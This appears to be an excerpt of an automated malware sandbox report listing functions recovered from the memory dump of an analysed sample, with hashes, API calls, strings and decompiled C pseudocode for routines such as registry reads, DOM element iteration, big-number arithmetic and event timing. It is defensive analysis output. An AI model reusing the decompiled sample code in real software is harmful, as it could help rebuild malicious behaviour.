Instruction Fuzzy Hash: 16F030B0A85302DFF720AF67AC09B657B68E704740F18552AE64EF51F0D7714509DF16

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E0230, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMON

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000), ref: 6E1E0255
CatchIt.LIBVCRUNTIME ref: 6E1E033B

Strings

MOC, xrefs: 6E1E0267
RCC, xrefs: 6E1E026F

Memory Dump Source

Source File: 00000003.00000002.478879912.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID: CatchEncodePointer
String ID: MOC$RCC
API String ID: 1435073870-2084237596
Opcode ID: b74a50174b272b65fd5755f54497048301d0dc0a730c83e9ddf67582a7103226
Instruction ID: 09812eb572f88051b1b6523a13d7fef47d65203ebcaacdc309d2dc04bd515dd1
Opcode Fuzzy Hash: b74a50174b272b65fd5755f54497048301d0dc0a730c83e9ddf67582a7103226
Instruction Fuzzy Hash: BF41597290060AEFDF05CFD4CD80ADEBBB5BF48304F294059F9186A221E7359A91EB51

Uniqueness

Uniqueness Score: -1.00%

Function 00E86A36, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80
registryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00E86A36(int _a4, int _a8, void* _a12, short* _a16, char** _a20, intOrPtr* _a24) {
				intOrPtr* _t38;
				char* _t42;
				long _t43;

				if(_a4 == 0) {
					L2:
					_t43 =  *0xe8a0cc(_a8, _a12,  &_a12);
					if(_t43 == 0) {
						RegQueryValueExW(_a12, _a16, 0,  &_a8, 0,  &_a4);
						if(_a4 == 0) {
							_t43 = 0xe8;
						} else {
							_t42 = E00E86837(_a4);
							if(_t42 == 0) {
								_t43 = 8;
							} else {
								_t43 = RegQueryValueExW(_a12, _a16, 0,  &_a8, _t42,  &_a4);
								if(_t43 != 0) {
									E00E850CA(_t42);
								} else {
									 *_a20 = _t42;
									_t38 = _a24;
									if(_t38 != 0) {
										 *_t38 = _a4;
									}
								}
							}
						}
						RegCloseKey(_a12);
					}
					L12:
					return _t43;
				}
				_t43 = E00E84323(_a4, _a8, _a12, _a16, _a20, _a24);
				if(_t43 == 0) {
					goto L12;
				}
				goto L2;
			}

0x00e86a42
0x00e86a65
0x00e86a75
0x00e86a79
0x00e86a91
0x00e86a96
0x00e86ade
0x00e86a98
0x00e86aa0
0x00e86aa4
0x00e86adb
0x00e86aa6
0x00e86ab8
0x00e86abc
0x00e86ad2
0x00e86abe
0x00e86ac1
0x00e86ac3
0x00e86ac8
0x00e86acd
0x00e86acd
0x00e86ac8
0x00e86abc
0x00e86aa4
0x00e86ae6
0x00e86ae6
0x00e86aed
0x00e86af3
0x00e86af3
0x00e86a5b
0x00e86a5f
0x00000000
0x00000000
0x00000000

APIs

RegQueryValueExW.ADVAPI32(05499D8C,?,00000000,80000002,00000000,00000000,?,00E81E36,3D00E890,80000002,00E830C2,00000000,00E830C2,?,05499D8C,80000002), ref: 00E86A91
RegQueryValueExW.ADVAPI32(05499D8C,?,00000000,80000002,00000000,00000000,00000000,?,00E81E36,3D00E890,80000002,00E830C2,00000000,00E830C2,?,05499D8C), ref: 00E86AB6
RegCloseKey.ADVAPI32(05499D8C,?,00E81E36,3D00E890,80000002,00E830C2,00000000,00E830C2,?,05499D8C,80000002,00000000,?), ref: 00E86AE6

Part of subcall function 00E84323: SafeArrayDestroy.OLEAUT32(00000000), ref: 00E843A8

Part of subcall function 00E850CA: RtlFreeHeap.NTDLL(00000000,00000000,00E84239,00000000,00000001,?,00000000,?,?,?,00E86B8D,00000000,?,00000001), ref: 00E850D6

Strings

gy, xrefs: 00E86A6F

Memory Dump Source

Source File: 00000003.00000002.473161048.0000000000E81000.00000020.00000001.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000003.00000002.473146636.0000000000E80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473203055.0000000000E89000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.473245144.0000000000E8A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473271496.0000000000E8C000.00000002.00000001.sdmp Download File

Similarity

API ID: QueryValue$ArrayCloseDestroyFreeHeapSafe
String ID: gy
API String ID: 1375095360-2402572685
Opcode ID: 1977d38c5ff39ef060c06ca961af7a8c28daf397d6a115b84fce68a59b70ca69
Instruction ID: 36f334c7c1e961633c7dd4511ca0394073fcef1d1852b7942438d179d145ba7a
Opcode Fuzzy Hash: 1977d38c5ff39ef060c06ca961af7a8c28daf397d6a115b84fce68a59b70ca69
Instruction Fuzzy Hash: DD21F37640012EAFDF16AF94DC80CEE7BA9EB08354B049066FE1DB7120D632DD64DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DF3C4, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 63COMMON

Download Yara Rule

APIs

__is_exception_typeof.LIBVCRUNTIME ref: 6E1DF458

Strings

MOC, xrefs: 6E1DF3D6
RCC, xrefs: 6E1DF3CE
csm, xrefs: 6E1DF3DE

Memory Dump Source

Source File: 00000003.00000002.478879912.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID: __is_exception_typeof
String ID: MOC$RCC$csm
API String ID: 3140442014-2671469338
Opcode ID: dd77ffe40cd1e8b56f92300ae912e55f6935dfb604c8c3f8fea01644735e1955
Instruction ID: df07498269ba94c48aa618e6ac6e95d2402d547aa54544affb8b60c40df23f57
Opcode Fuzzy Hash: dd77ffe40cd1e8b56f92300ae912e55f6935dfb604c8c3f8fea01644735e1955
Instruction Fuzzy Hash: A4115E72504216EFD714CFE4C440AD9B7A8EF58315F36449AE8609B260D7B4EFC8EB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E206E99, Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 6E206F20

Memory Dump Source

Source File: 00000003.00000002.478879912.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 869dc4886e6a6f5b561d51b04d4c0ce346a2230bcee0f7184eb0f62dba287ef0
Instruction ID: ba8c59ad215e02c1a2c86368be73c70d4f8792954acb60449382fe6cc0a27bfa
Opcode Fuzzy Hash: 869dc4886e6a6f5b561d51b04d4c0ce346a2230bcee0f7184eb0f62dba287ef0
Instruction Fuzzy Hash: 0CB1587191424E9FEB11DFA8C890BEEBBF7EF85300F1845A9E4559B3C0D6748A42CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E38E5, Relevance: 6.2, APIs: 4, Instructions: 201COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E1E38EC
UnDecorator::getSymbolName.LIBCMT ref: 6E1E397A
DName::operator+.LIBCMT ref: 6E1E3A7E

Part of subcall function 6E1E148F: shared_ptr.LIBCMT ref: 6E1E14AB

DName::DName.LIBVCRUNTIME ref: 6E1E3B3B

Memory Dump Source

Source File: 00000003.00000002.478879912.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID: Name$Decorator::getH_prolog3Name::Name::operator+Symbolshared_ptr
String ID:
API String ID: 334624791-0
Opcode ID: c2f40437fbe2cdcb5b514af99b10a1e46a699f528f29111281d4bff4954110d5
Instruction ID: 788678deacd600c842507591c9958627e2a952d00931a679bf1be25158dcb251
Opcode Fuzzy Hash: c2f40437fbe2cdcb5b514af99b10a1e46a699f528f29111281d4bff4954110d5
Instruction Fuzzy Hash: 9A81A075D04A098FDB04CFD4C459BEDBBB5BF09700F24406AF902ABAA0D7349A82DF60

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DFC23, Relevance: 6.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 6E1DFCEA
___AdjustPointer.LIBCMT ref: 6E1DFD0D
___AdjustPointer.LIBCMT ref: 6E1DFDA9

Memory Dump Source

Source File: 00000003.00000002.478879912.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 3e01f91299c94dcc774d947c138fffaf3ec31a7d7fe0365a1e50abcff5f7ef0b
Instruction ID: 67cddffe3837fc63d73840d07328cd8d0e21cdb785579157f7ee4b243cf91b4b
Opcode Fuzzy Hash: 3e01f91299c94dcc774d947c138fffaf3ec31a7d7fe0365a1e50abcff5f7ef0b
Instruction Fuzzy Hash: AC510372504A07AFDB148FD5D850BAA73B5EF19314F30092DED254B2A0E731EAD8E790

Uniqueness

Uniqueness Score: -1.00%

Function 00E86C6D, Relevance: 6.2, APIs: 4, Instructions: 152
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E00E86C6D(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr _t78;
				intOrPtr* _t82;
				intOrPtr* _t86;
				intOrPtr _t102;
				intOrPtr _t108;
				void* _t117;
				void* _t121;
				void* _t122;
				intOrPtr _t129;

				_t122 = _t121 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t117 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t117 >= 0) {
					_t54 = _v8;
					_t102 =  *0xe8a2d4; // 0x460d5a8
					_t5 = _t102 + 0xe8b038; // 0x3050f485
					_t117 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t117 >= 0) {
						__imp__#2(0xe892b0);
						_v28 = _t57;
						if(_t57 == 0) {
							_t117 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t86 = __imp__#6;
							_t117 = _t61;
							if(_t117 >= 0) {
								_t63 = _v24;
								_t117 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t117 >= 0) {
									_t129 = _v20;
									if(_t129 != 0) {
										_v64 = 3;
										_v48 = 3;
										_v56 = 0;
										_v40 = 0;
										if(_t129 > 0) {
											while(1) {
												_t67 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t122 = _t122;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t117 =  *((intOrPtr*)( *_t67 + 0x2c))(_t67,  &_v8);
												if(_t117 < 0) {
													goto L16;
												}
												_t69 = _v8;
												_t108 =  *0xe8a2d4; // 0x460d5a8
												_t28 = _t108 + 0xe8b0bc; // 0x3050f1ff
												_t117 =  *((intOrPtr*)( *_t69))(_t69, _t28,  &_v16);
												if(_t117 >= 0) {
													_t74 = _v16;
													_t117 =  *((intOrPtr*)( *_t74 + 0x34))(_t74,  &_v12);
													if(_t117 >= 0 && _v12 != 0) {
														_t78 =  *0xe8a2d4; // 0x460d5a8
														_t33 = _t78 + 0xe8b078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t82 = _v16;
															 *((intOrPtr*)( *_t82 + 0x114))(_t82);
														}
														 *_t86(_v12);
													}
													_t76 = _v16;
													 *((intOrPtr*)( *_t76 + 8))(_t76);
												}
												_t71 = _v8;
												 *((intOrPtr*)( *_t71 + 8))(_t71);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t86(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t117;
			}

0x00e86c72
0x00e86c7b
0x00e86c7c
0x00e86c80
0x00e86c86
0x00e86c8c
0x00e86c95
0x00e86c9b
0x00e86ca5
0x00e86ca7
0x00e86cad
0x00e86cb2
0x00e86cbd
0x00e86cc5
0x00e86cc8
0x00e86deb
0x00e86cce
0x00e86cce
0x00e86cdb
0x00e86ce1
0x00e86ce7
0x00e86ceb
0x00e86cf1
0x00e86cfe
0x00e86d02
0x00e86d08
0x00e86d0b
0x00e86d11
0x00e86d17
0x00e86d1d
0x00e86d20
0x00e86d23
0x00e86d29
0x00e86d32
0x00e86d38
0x00e86d39
0x00e86d3c
0x00e86d3d
0x00e86d3e
0x00e86d46
0x00e86d47
0x00e86d48
0x00e86d4a
0x00e86d4e
0x00e86d52
0x00000000
0x00000000
0x00e86d58
0x00e86d61
0x00e86d67
0x00e86d71
0x00e86d75
0x00e86d77
0x00e86d84
0x00e86d88
0x00e86d90
0x00e86d95
0x00e86da7
0x00e86da9
0x00e86daf
0x00e86daf
0x00e86db8
0x00e86db8
0x00e86dba
0x00e86dc0
0x00e86dc0
0x00e86dc3
0x00e86dc9
0x00e86dcc
0x00e86dd5
0x00000000
0x00000000
0x00000000
0x00e86dd5
0x00e86d29
0x00e86d23
0x00e86d0b
0x00e86ddb
0x00e86ddb
0x00e86de1
0x00e86de1
0x00e86de7
0x00e86de7
0x00e86df0
0x00e86df6
0x00e86df6
0x00e86cb2
0x00e86dff

APIs

SysAllocString.OLEAUT32(00E892B0), ref: 00E86CBD
lstrcmpW.KERNEL32(00000000,0076006F), ref: 00E86D9F
SysFreeString.OLEAUT32(00000000), ref: 00E86DB8
SysFreeString.OLEAUT32(?), ref: 00E86DE7

Memory Dump Source

Source File: 00000003.00000002.473161048.0000000000E81000.00000020.00000001.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000003.00000002.473146636.0000000000E80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473203055.0000000000E89000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.473245144.0000000000E8A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473271496.0000000000E8C000.00000002.00000001.sdmp Download File

Similarity

API ID: String$Free$Alloclstrcmp
String ID:
API String ID: 1885612795-0
Opcode ID: f4dc75874c048976a21d5e216d434837f458e49d02dbc1ab7b19a277f6a86a5d
Instruction ID: 4ce10ec1acb5a91a4c6265c2acef0c8380e64cfd12ce5857b6098dde0afe74ca
Opcode Fuzzy Hash: f4dc75874c048976a21d5e216d434837f458e49d02dbc1ab7b19a277f6a86a5d
Instruction Fuzzy Hash: F0513175E00519EFCB01EFA8C8888AEB7B5FF88704B144595E919FB365D7719D01CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E3F92, Relevance: 6.1, APIs: 4, Instructions: 144COMMON

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIME ref: 6E1E401A

Part of subcall function 6E1E1130: __aulldvrm.LIBCMT ref: 6E1E1161

DName::operator+.LIBCMT ref: 6E1E4027
DName::operator=.LIBVCRUNTIME ref: 6E1E40A7
DName::DName.LIBVCRUNTIME ref: 6E1E40C7

Memory Dump Source

Source File: 00000003.00000002.478879912.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID: NameName::$Name::operator+Name::operator=__aulldvrm
String ID:
API String ID: 2448499823-0
Opcode ID: f847c0b7c92ff123e277dfc4bd0f4996b11cff01a6bf3961fcd27f5ae4bf347c
Instruction ID: d557ede8aeb8632d66c0ff24224979aa05b50dbd0689734f4bec5be366ca53bf
Opcode Fuzzy Hash: f847c0b7c92ff123e277dfc4bd0f4996b11cff01a6bf3961fcd27f5ae4bf347c
Instruction Fuzzy Hash: 2A518E75900A19DFCB05CF98C9516EEBBB4FB16700F1181AAF5119BB90D770AAC2DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00E85D93, Relevance: 6.1, APIs: 4, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00E85D93(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v156;
				void _v428;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E00E828F1(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E00E81000(_t79,  &_v428);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E00E83915(_t101,  &_v428, _a8, _t96 - _t81);
					E00E83915(_t79,  &_v156, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
					_t66 = E00E81000(_t101, 0xe8a188);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E00E81000(_a16, _a4);
						E00E83B6F(_t79,  &_v428, _a4, _t97);
						memset( &_v428, 0, 0x10c);
						_t55 = memset( &_v156, 0, 0x84);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L00E87D8C();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L00E87D86();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0x1a8;
						_a12 = _t74;
						_t76 = E00E8679F(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v156;
							if(E00E85AC5(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E00E84A54(_t79,  &_v156, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(0xe8a188 + _a8 * 4) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}

0x00e85d96
0x00e85da2
0x00e85da8
0x00e85dad
0x00e85db1
0x00e85f23
0x00e85f27
0x00e85f27
0x00e85db7
0x00e85dbb
0x00e85dc1
0x00e85dc2
0x00e85dcd
0x00e85dd3
0x00e85dd8
0x00e85ddb
0x00e85df5
0x00e85e04
0x00e85e10
0x00e85e1a
0x00e85e1f
0x00e85e21
0x00e85e24
0x00e85edb
0x00e85ee1
0x00e85ef2
0x00e85f05
0x00e85f1b
0x00000000
0x00e85f20
0x00e85e2d
0x00e85e34
0x00e85e38
0x00e85e3e
0x00e85e40
0x00e85e42
0x00e85e44
0x00e85e46
0x00e85e50
0x00e85e55
0x00e85e57
0x00e85e59
0x00e85e5a
0x00e85e5b
0x00e85e5c
0x00e85e63
0x00e85e6a
0x00e85e6d
0x00e85e6d
0x00e85e3a
0x00e85e3a
0x00e85e3a
0x00e85e75
0x00e85e7d
0x00e85e89
0x00e85e8e
0x00e85e8e
0x00e85e93
0x00000000
0x00000000
0x00e85e95
0x00e85e98
0x00e85ea5
0x00000000
0x00000000
0x00e85ea7
0x00e85ea7
0x00e85eb4
0x00e85e8e
0x00e85e93
0x00000000
0x00000000
0x00000000
0x00e85e93
0x00e85ebe
0x00e85ec1
0x00e85ec4
0x00e85ecb
0x00e85ecb
0x00e85ed8
0x00000000
0x00e85ed8
0x00e85dc4
0x00e85dc8
0x00e85dc9
0x00e85dcb
0x00000000
0x00000000
0x00000000
0x00e85dcb
0x00000000

APIs

_allmul.NTDLL(?,00000000,00000000,00000001), ref: 00E85E46
_aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 00E85E5C
memset.NTDLL ref: 00E85F05
memset.NTDLL ref: 00E85F1B

Memory Dump Source

Source File: 00000003.00000002.473161048.0000000000E81000.00000020.00000001.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000003.00000002.473146636.0000000000E80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473203055.0000000000E89000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.473245144.0000000000E8A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473271496.0000000000E8C000.00000002.00000001.sdmp Download File

Similarity

API ID: memset$_allmul_aulldiv
String ID:
API String ID: 3041852380-0
Opcode ID: f74b839e887fc990895f83d3cc00ccb9bd5a3206973a7002b02c62bf7fd805f2
Instruction ID: 6ad33cf9a9a70a91ccf5ea2668ee6b0aef8052f7f2235f8557ceb40e2129f114
Opcode Fuzzy Hash: f74b839e887fc990895f83d3cc00ccb9bd5a3206973a7002b02c62bf7fd805f2
Instruction Fuzzy Hash: E341A072A00219AFDB20BF68CC41BEE77A9EF45750F105569F81DB7281DB70AE458B80

Uniqueness

Uniqueness Score: -1.00%

Function 6E1EF035, Relevance: 6.1, APIs: 4, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.478879912.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32db720dd2b773cf8f2003f4d67849fa130cfdb7d0dab187eb8489d1dd80e6df
Instruction ID: a11a98d19e5b821c9b42435c4cc81ea7b0c0a8dddcc855cd18672410a97a2165
Opcode Fuzzy Hash: 32db720dd2b773cf8f2003f4d67849fa130cfdb7d0dab187eb8489d1dd80e6df
Instruction Fuzzy Hash: 4C411A72600B08AFE315DFB8DC00BDEBBE9EB8D710F204929F525DB680D3709A819780

Uniqueness

Uniqueness Score: -1.00%

Function 00E83032, Relevance: 6.1, APIs: 4, Instructions: 87
sleepCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E00E83032(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t38 = E00E86710(__ecx,  &_v32);
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t23 =  &(_t39[1]);
						if(_t39[1] != 0) {
							E00E815B9(_t23);
						}
					}
					return _t38;
				}
				if(E00E84C8C(0x40,  &_v16) != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0xe8a2f8, 1, 0,  *0xe8a394);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E00E84039(_t36);
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E00E81D57(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E00E83C84(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E00E873C3( &_v32, _t39);
					goto L13;
				}
			}

0x00e83032
0x00e8303f
0x00e83045
0x00e83046
0x00e83047
0x00e83048
0x00e83049
0x00e8304d
0x00e83059
0x00e8305d
0x00e830e5
0x00e830e5
0x00e830e8
0x00e830ea
0x00e830f2
0x00e830f8
0x00e830fb
0x00e830fb
0x00e830f8
0x00e83106
0x00e83106
0x00e83070
0x00e83072
0x00e83072
0x00e83089
0x00e8308d
0x00e83090
0x00e8309b
0x00e830a2
0x00e830a2
0x00e830ae
0x00e830af
0x00e830bd
0x00e830b1
0x00e830b1
0x00e830b2
0x00e830b3
0x00e830b4
0x00e830b5
0x00e830b6
0x00e830b6
0x00e830c2
0x00e830c7
0x00e830c9
0x00e830cb
0x00e830cb
0x00e830d2
0x00000000
0x00e830d4
0x00e830d4
0x00e830e1
0x00000000
0x00e830e1

APIs

CreateEventA.KERNEL32(00E8A2F8,00000001,00000000,00000040,?,?,74B5F710,00000000,74B5F730,?,?,?,?,00E8211B,?,00000001), ref: 00E83083
SetEvent.KERNEL32(00000000,?,?,?,?,00E8211B,?,00000001,00E8560C,00000002,?,?,00E8560C), ref: 00E83090
Sleep.KERNEL32(00000BB8,?,?,?,?,00E8211B,?,00000001,00E8560C,00000002,?,?,00E8560C), ref: 00E8309B
CloseHandle.KERNEL32(00000000,?,?,?,?,00E8211B,?,00000001,00E8560C,00000002,?,?,00E8560C), ref: 00E830A2

Part of subcall function 00E84039: WaitForSingleObject.KERNEL32(00000000,?,?,?,00E830C2,?,00E830C2,?,?,?,?,?,00E830C2,?), ref: 00E84113
Part of subcall function 00E84039: RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,00E830C2,?,?,?,?,?,00E8211B,?), ref: 00E8413B

Memory Dump Source

Source File: 00000003.00000002.473161048.0000000000E81000.00000020.00000001.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000003.00000002.473146636.0000000000E80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473203055.0000000000E89000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.473245144.0000000000E8A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473271496.0000000000E8C000.00000002.00000001.sdmp Download File

Similarity

API ID: CloseEvent$CreateHandleObjectSingleSleepWait
String ID:
API String ID: 467273019-0
Opcode ID: 8a382cec259c7c67f29fcb59c1524f8ec11e7457870c8cacad558c6fe8bb8a2b
Instruction ID: a779c1d2568bd63bdc5b5155efccbab09e3dac0e7fbd912a29843bf96ab90dd3
Opcode Fuzzy Hash: 8a382cec259c7c67f29fcb59c1524f8ec11e7457870c8cacad558c6fe8bb8a2b
Instruction Fuzzy Hash: 5721CF72D00218AFCB20BFF5C8859EEB7BDAB44B54B05542AFA1DB7140DB31DE458BA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E200B42, Relevance: 6.1, APIs: 4, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.478879912.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4bc2f14adc6c7bc3b42b024870a8aef56e00d0ab8883960101c6c4e449cd667
Instruction ID: 7d796a9c44e93519ef79ff1f56faafea14c8054d5abecd265e2128ac668a1eb2
Opcode Fuzzy Hash: c4bc2f14adc6c7bc3b42b024870a8aef56e00d0ab8883960101c6c4e449cd667
Instruction Fuzzy Hash: F421087295562AABE7514EE88C54F5A3B6A9F027A9F110910ED2AA72C1F630E901C5E0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1FDDF6, Relevance: 6.1, APIs: 4, Instructions: 72COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,6E20DD5B,00000000,00000001,6E2057FE,?,6E20E22B,00000001,?,?,?,6E2055A5,?,00000000), ref: 6E1FDDFB
_free.LIBCMT ref: 6E1FDE58
_free.LIBCMT ref: 6E1FDE8E
SetLastError.KERNEL32(00000000,6E21B05C,000000FF,?,6E20E22B,00000001,?,?,?,6E2055A5,?,00000000,00000000,6E21A818,0000002C,6E2057FE), ref: 6E1FDE99

Memory Dump Source

Source File: 00000003.00000002.478879912.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: d6fd285590b343c42163a45b46d4e4ab7e39eb6363ec244fad344ffeaa8a53ad
Instruction ID: 19b6621cf91f53700cce6328cf5b12bea227c632d00809503409593d96d0de21
Opcode Fuzzy Hash: d6fd285590b343c42163a45b46d4e4ab7e39eb6363ec244fad344ffeaa8a53ad
Instruction Fuzzy Hash: E211C876648605EF971155E48C99FBB12EF8BE26797310A24E234861C1EF618883B9B1

Uniqueness

Uniqueness Score: -1.00%

Function 6E1FDF4D, Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,6E1FD6F8,6E200144,?,?,6E1DDC30,?,?,6E1DC69D,000008DA,6E21B004), ref: 6E1FDF52
_free.LIBCMT ref: 6E1FDFAF
_free.LIBCMT ref: 6E1FDFE5
SetLastError.KERNEL32(00000000,6E21B05C,000000FF,?,?,?,6E1FD6F8,6E200144,?,?,6E1DDC30,?,?,6E1DC69D,000008DA,6E21B004), ref: 6E1FDFF0

Memory Dump Source

Source File: 00000003.00000002.478879912.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 44098a0b6e18129c68cf9c42d74f78039545188b71e90be0b5c30bd1ebc769ba
